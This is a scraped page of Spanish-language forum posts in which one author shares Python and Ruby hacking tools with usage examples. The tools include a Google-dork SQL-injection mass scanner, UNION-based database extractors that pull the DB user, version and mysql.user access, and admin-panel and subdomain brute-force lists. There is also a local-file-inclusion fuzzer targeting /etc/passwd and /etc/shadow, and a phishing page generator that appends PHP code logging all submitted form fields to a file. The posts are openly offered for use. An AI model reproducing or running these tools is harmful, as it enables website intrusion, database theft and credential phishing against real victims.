|
401
|
Programación / Scripting / [Python] Google Inyector By dODDY h
|
en: 7 Octubre 2011, 01:36 am
|
Bueno , acabo de hacer un scanner de sqli. Este busca en google paginas con un dork marcado por ustedes , para despues borrar repetidos y scanear las webs encontradas #!usr/bin/python #Google Iny (C) Doddy Hackman 2011 import urllib2,re,os,sys def head(): print "\n\n -- == Google Iny == --\n" def copyright(): print "\n(C) Doddy Hackman 2011\n" sys.exit(1) def toma(web) : nave = urllib2.Request(web) nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5'); op = urllib2.build_opener() return op.open(nave).read() def show(): print "\n[+] Sintax : ",sys.argv[0]," <dork> <count>\n" def limpiar(pag): limpia = [] for p in pag: if not (re.findall("http://www.google.com.ar",p,re.I)): if p not in limpia: limpia.append(p) return limpia def sql(webs): for web in webs : if re.findall("=",web): web = re.split("=",web) web = web[0]+"=" try: code = toma(web+"-1+union+select+1--") if (re.findall("The used SELECT statements have a different number of columns",code,re.I)): print "[SQLI] : ",web,"\n" except: pass def scan(dork,count): pag = [] s = 10 while s <= int(count): try: code = toma("http://www.google.com.ar/search?hl=&q="+str(dork)+"&start="+repr(s)) d = re.findall("(?<=\"r\"><. href=\")[^\"]+",code) s += 10 for a in d: pag.append(a) except: copyright() pag = limpiar(pag) return pag head() if len(sys.argv) != 3: show() else : print "\n[+] SQL Scan Started\n" print "[+] Dork : ",sys.argv[1] print "[+] Count : ",sys.argv[2] pages = scan(sys.argv[1],sys.argv[2]) print "\n[+] Webs Found : ",len(pages),"\n" sql(pages) copyright()
|
|
|
402
|
Programación / Scripting / [Python] Fuzz DNS By Doddy H
|
en: 7 Octubre 2011, 01:34 am
|
Hola a todos. Aca les dejo un simple buscador de dns , solo ponen el dominio y esta cosita se encarga de buscarlas. #!usr/bin/python #LFI T00l (C) Doddy Hackman import os,sys,urllib2,re dns = ['www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc'] def header() : print "\n--== Fuzz DNS ==--\n" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" exit(1) def show() : print "\n[*] Sintax : ",sys.argv[0]," <web>\n" def toma(web) : return urllib2.urlopen(web).read() def search(web): print "\n[+] Searching DNS in",web,"\n" try: for d in dns: toma("http://"+d+"."+web) print "[DNS Link] : http://"+d+"."+web except: pass header() if len(sys.argv) != 2 : show() else : search(sys.argv[1]) copyright() #The End
Ejemplo de uso C:/Users/dODDYh/Desktop/Arsenal X parte 2>fuzzdns.py google.com
--== Fuzz DNS ==--
[+] Searching DNS in google.com
[DNS Link] : http://www.google.com
(C) Doddy Hackman 2010
|
|
|
403
|
Programación / Scripting / [Python] FTP Manager
|
en: 7 Octubre 2011, 01:34 am
|
Hola Aca traigo un simple cliente FTP #!usr/bin/python #FTP Manager 0.2 (C) Doddy Hackman 20111 from ftplib import FTP import sys def head(): print "\n -- == FTP Manger == --\n\n" def copyright(): print "\n\n(C) Doddy Hackman 2011\n" sys.exit(1) def show(): print "\nSintax : "+sys.argv[0]+" <host> <user> <pass>\n" def menu(): print "\n" print "1 : dir" print "2 : cwd" print "3 : chdir" print "4 : delete dir" print "5 : delete file" print "6 : rename file" print "7 : make directory" print "8 : size" print "9 : abort\n\n" op = input("[Option] : ") return op def enter(host,user,password): print "[+] Connecting to ",host,"\n" enter = FTP(host,user,password) print "\n[+] Enter in the system\n" def menu2(): op = menu() if op == 1: try: lista = enter.dir() for a in lista: print a menu2() except: menu2() elif op == 2: try: print "\n\n[+] Path : "+enter.pwd()+"\n\n" menu2() except: menu2() elif op == 3: try: dir = raw_input("\n\n[Directory] : ") enter.cwd(dir) print "\n\n[+] Directory Changed\n\n" menu2() except: menu2() elif op == 4: try: dir = raw_input("\n\n[Directory] : ") enter.rmd(dir) print "\n\n[+] Directory Deleted\n\n" menu2() except: menu2() elif op == 5: try: file = raw_input("\n\n[File] : ") enter.delete(file) print "\n\n[+] File Deleted\n\n" menu2() except: menu2() elif op == 6: try: oldfile = raw_input("\n\n[Name] : ") newfile = raw_input("\n[New Name] : ") enter.rename(oldfile,newfile) print "\n\n[+] Name Changed\n\n" menu2() except: menu2() elif op == 7: try: dir = raw_input("\n\n[New Directory] : ") enter.mkd(dir) print "\n\n[+] Directory Created\n\n" menu2() except: menu2() elif op == 8: try: file = raw_input("\n\n[File] : ") peso = enter.size(file) print "\n\n[+] ",peso," KB \n\n" menu2() except: menu2() elif op == 9: enter.quit() copyright() else: menu2() menu2() head() if len(sys.argv) != 4: show() else: enter(sys.argv[1],sys.argv[2],sys.argv[3]) copyright()
|
|
|
404
|
Programación / Scripting / [Python] Finder Admin By Doddy H
|
en: 7 Octubre 2011, 01:33 am
|
Hola a todos. Hoy termine un script en python para buscar el famoso panel de administraction #!usr/bin/python #Finder Admin (C) Doddy Hackman import sys,httplib,os os.system("cls") panels=['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/'] def header() : print "\n--== Finder Admin ==--\n" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" exit(1) header() def show() : print "\n[*] Sintax : ",sys.argv[0]," <web>\n" def toma(web,path): nave = httplib.HTTPConnection(web) nave.request("GET","/"+path) return nave.getresponse().status def buscar(web): print "\n[+] Target : ",web,"\n\n" for path in panels: try: code = toma(web,path) if code ==200: print "[Link] : "+web+"/"+path except(KeyboardInterrupt): copyright() except: pass if len(sys.argv) != 2 : show() else: buscar(sys.argv[1]) copyright() #The End
Un ejemplo de uso seria python finder.py 127.0.0.1
--== Finder Admin ==--
[+] Target : 127.0.0.1
[Link] : 127.0.0.1/admin/ [Link] : 127.0.0.1/login.php [Link] : 127.0.0.1/phpmyadmin/
(C) Doddy Hackman 2010
Eso si no usen http:// en la web que quieran escanear , ejemplo www.google.com.ar
|
|
|
405
|
Programación / Scripting / [Python] Easy Inyector By Doddy H
|
en: 7 Octubre 2011, 01:33 am
|
Bueno esta es la primera version de este simple programa que hice en perl , en la siguiente version le agregare otras cosas y podra scanear varios en un archivo de texto. Esta cosa busca: * Vulnerabilidad (obvio) * Limite de columnas * Informacion sobre la base de datos * Automaticamente buscar el numero que permite mostrar informacion * Verifica existencia de mysql.user y information.schema.tables #!usr/bin/python #Easy Inyector (C) Doddy Hackman 2010 import os,sys,urllib2,re def clean(): if sys.platform=="win32": os.system("cls") else: os.system("clear") def header() : print "\n--== Easy Inyector ==--\n" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" sys.exit(1) def show() : print "\n[*] Sintax : ",sys.argv[0]," <web>\n" def toma(web) : return urllib2.urlopen(web).read() def bypass(bypass): if bypass == "--": return("+","--") elif bypass == "/*": return("/**/","/*") else: return("+","--") def more(web,passx): pass1,pass2 = bypass(passx) print "\n[+] Searching more data\n" web1 = re.sub("hackman","concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)",web) code0 = toma(web1) if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)): datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0) datar = re.split("K0BRA",datax[0]) print "[+] Username :",datar[1] print "[+] Database :",datar[2] print "[+] Version :",datar[3],"\n" code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2) if (re.findall("K0BRA",code1)): print "[+] mysql.user : on" code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2) if (re.findall("K0BRA",code2)): print "[+] information_schema.tables : on" def findlength(web,passx): pass1,pass2 = bypass(passx) print "\n[+] Finding columns length" number = "concat(0x4b30425241,1,0x4b30425241)" for te in range(2,30): number = str(number)+","+"concat(0x4b30425241,"+str(te)+",0x4b30425241)" code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2) if (re.findall("K0BRA(.*?)K0BRA",code)): numbers = re.findall("K0BRA(.*?)K0BRA",code) print "[+] Column length :",te print "[+] Numbers",numbers,"print data" sql = "" tex = te + 1 for sqlix in range(2,tex): sql = str(sql)+","+str(sqlix) sqli = str(1)+sql sqla = re.sub(numbers[0],"hackman",sqli) more(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx) print "\n[+] Scan Finished\n" sys.exit(1) print "[-] Length dont found\n" def scan(web,passx): pass1,pass2 = bypass(passx) print "\n[+] Testing vulnerability" code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2) if (re.findall("The used SELECT statements have a different number of columns",code,re.I)): print "[+] SQLI Detected" findlength(web,passx) else: print "[-] Not Vulnerable" copyright() header() if len(sys.argv) != 2 : show() else : try: scan(sys.argv[1],"--") except: copyright() #The End
Ejemplo de uso C:/Users/DoddyH/Desktop/Arsenal X parte 2>sqli.py http://127.0.0.1/sql.php?id=
--== Easy Inyector ==--
[+] Testing vulnerability [+] SQLI Detected
[+] Finding columns length [+] Column length : 3 [+] Numbers ['1', '2', '3'] print data
[+] Searching more data
[+] Username : root@localhost [+] Database : hackman [+] Version : 5.1.41
[+] mysql.user : on [+] information_schema.tables : on
[+] Scan Finished
(C) Doddy Hackman 2010
|
|
|
406
|
Programación / Scripting / [Python] Console By Doddy H
|
en: 7 Octubre 2011, 01:32 am
|
Bueno este es un simple ejecutor de comandos hecho en tk #!usr/bin/python #Console (C) Doddy Hackman 2011 from Tkinter import * import subprocess global x def execa() : re = subprocess.Popen(cmd.get(),shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE) if re: panel.insert(END,re.stdout.read()) else: panel.insert(END,re.stderr.read()) window = Tk() window.title("Console (C) Doddy Hackman 2011") window.maxsize(width="400",height="320") window.minsize(width="400",height="320") window.configure(background="black") window.configure(cursor="tcross") cmd = StringVar() panel = Text(window,width=30,height=15,bg="black",fg="green") Label(window,bg="black").grid(row=1) Label(window,text="Command : ",bg="black",fg="green").grid(row=3,column=4) entry = Entry(window,width=35,textvariable=cmd,bg="black",fg="green").grid(row=3,column=5) Button(text="Cargar",bg="black",fg="green",activebackground="green",command=execa).grid(row=3,column=9) Label(window,bg="black").grid(row=4) panel.grid(row=10,column=5) window.mainloop()
|
|
|
407
|
Programación / Scripting / [Ruby] SQLI Scanner
|
en: 7 Octubre 2011, 01:32 am
|
Un scanner de SQLI en ruby #!usr/bin/ruby #SQLI Scannerl (C) Doddy Hackman 2010 #contact me : doddy-hackman.blogspot.com require 'net/http' def uso print "\n[+] sqli.rb <site>\n" end def toma(host,path) http = Net::HTTP.new(host,80) return http.get(path).body end def details(web,more) web1 = more.sub(/hackman/,"0x4b30425241") more = more.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)") print "\n\n[+] Extrating information of the DB\n\n" url = URI.parse(web) code = toma(url.host,url.path+"?"+url.query+more) if code=~/K0BRA(.*?)K0BRA(.*?)K0BRA(.*?)K0BRA/ print "[username] : "+$1+"\n" print "[database] : "+$2+"\n" print "[version] : "+$3+"\n\n" test1 = toma(url.host,url.path+"?"+url.query+web1+"+from+information_schema.tables") test2 = toma(url.host,url.path+"?"+url.query+web1+"+from+mysql.user") if test1=~/K0BRA/ print "[information_schema.tables] : ON\n" end if test2=~/K0BRA/ print "[mysql.user] : ON" end else print "\n[-] Not Found\n\n" end end def scan(web) print "\n[+] Testing the vulnerability SQLI...\n\n" url = URI.parse(web) codetest = toma(url.host,url.path+"?"+url.query+"-1+union+select+1") if codetest=~/The used SELECT statements have a different number of columns/ print "[+] SQLI Detected\n\n" else print "[-] Not Vulnerable to SQLI\n\n" copyright() end z = "1" x = "concat(0x4b30425241,1,0x4b30425241)" for num in ('2'..'25') z = z+","+num x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)" #print url.host,url.path+"?"+url.query+"-1+union+select+"+x+"\n" code = toma(url.host,url.path+"?"+url.query+"-1+union+select+"+x) if code=~/K0BRA(.*?)K0BRA/ print "[+] The Page has "+num+" columns\n" print "[+] The number "+$1+" print data\n\n" z = z.sub($1,"hackman") print "[SQLI] : "+web+"-1+union+select+"+z details(web,"-1+union+select+"+z) copyright() end end print "\n\n[-] Not Found the numbers of the columns\n\n" copyright() end def head() print "\n\n -- == SQLI Scanner == --\n\n" end def copyright() print "\n\n\n(C) Doddy Hackman 2010\n\n" exit(1) end head() if !ARGV[0] uso() else scan(ARGV[0]) copyright() end copyright()
|
|
|
408
|
Programación / Scripting / [Ruby] Phishing Gen
|
en: 7 Octubre 2011, 01:31 am
|
Un generador de fakes #!usr/bin/ruby #PHishing Gen (C) Doddy Hackman 2010 #contact me : doddy-hackman.blogspot.com require 'net/http' def uso print "\n[+] fake.rb <site> <result>\n" end def toma(web) return Net::HTTP.get(web) end def savefile(filename,text) files = File.open(filename,'a') files.puts text end def gen(web,file,magic) print "\n\n[+] Getting the source...\n" begin code = toma(URI.parse(web)) savefile(file,code+"\n"+magic) print "[+] Finish" copyright() end end def head() print "\n\n -- == Phising Gen == --\n\n" end def copyright() print "\n\n\n(C) Doddy Hackman 2010\n\n" exit(1) end head() if !ARGV[0] and !ARGV[1] uso() else text ='<?php $file = fopen("dump.txt", "a");foreach($_POST as $uno => $dos) {fwrite($file, $uno."=".$dos."\r\n");}foreach($_GET as $tres => $cuatro) {fwrite($file, $tres."=".$cuatro."\r\n");}fclose($file);?>' gen(ARGV[0],ARGV[1],text) end copyright()
|
|
|
409
|
Programación / Scripting / [Ruby] Panel Control
|
en: 7 Octubre 2011, 01:31 am
|
Un buscador de panel de administracion #!usr/bin/ruby #Panel cONTROL (C) Doddy Hackman 2010 #contact me : doddy-hackman.blogspot.com panels = ['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/'] require 'net/http' def uso print "\n[+] panelcontol.rb <site>\n" end def toma(web) return Net::HTTP.get_response(web) end def scan(web,panels) print "\n[+] Starting the scan...\n\n\n" panels.each do |panel| begin begin code = toma(URI.parse(web+"/"+panel)) rescue copyright() end case code when Net::HTTPSuccess print "[Link] : "+web+"/"+panel+"\n" end end end end def head() print "\n\n -- == Panel Control == --\n\n" end def copyright() print "\n\n\n(C) Doddy Hackman 2010\n\n" exit(1) end head() if !ARGV[0] uso() else scan(ARGV[0],panels) end copyright()
|
|
|
410
|
Programación / Scripting / [Ruby] LFI T00l
|
en: 7 Octubre 2011, 01:30 am
|
Un scanner de LFI #!usr/bin/ruby #LFI tool (C) Doddy Hackman 2010 #contact me : doddy-hackman.blogspot.com require 'net/http' def uso print "\n[+] lfi.rb <site>\n" end def toma(host,path) http = Net::HTTP.new(host,80) return http.get(path).body end def fuzz(web) files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc'] files.each do |file| begin url = URI.parse(web) code = toma(url.host,url.path+"?"+url.query+file) if not code=~/No such file or directory in/ print "[Link] : "+web+file+"\n" end end end end def scan(web) print "\n[+] Testing the vulnerability LFI...\n\n" begin url = URI.parse(web) code = toma(url.host,url.path+"?"+url.query+"'") if code=~/No such file or directory in/ saca = code.split("No such file or directory in <b>") saca = saca[1].split("<\/b> on line") print "[+] LFI Detected\n\n" print "[Full Path Discloure]: "+saca[0]+"\n" print "\n\n[+] Fuzzing Files\n\n" fuzz(web) print "\n[+] Finish\n" copyright() else print "[-] Not Vulnerable to LFI\n\n" end end end def head() print "\n\n -- == LFI tOOL == --\n\n" end def copyright() print "\n\n\n(C) Doddy Hackman 2010\n\n" exit(1) end head() if !ARGV[0] uso() else scan(ARGV[0]) end copyright()
|
|
|
|
|
|
|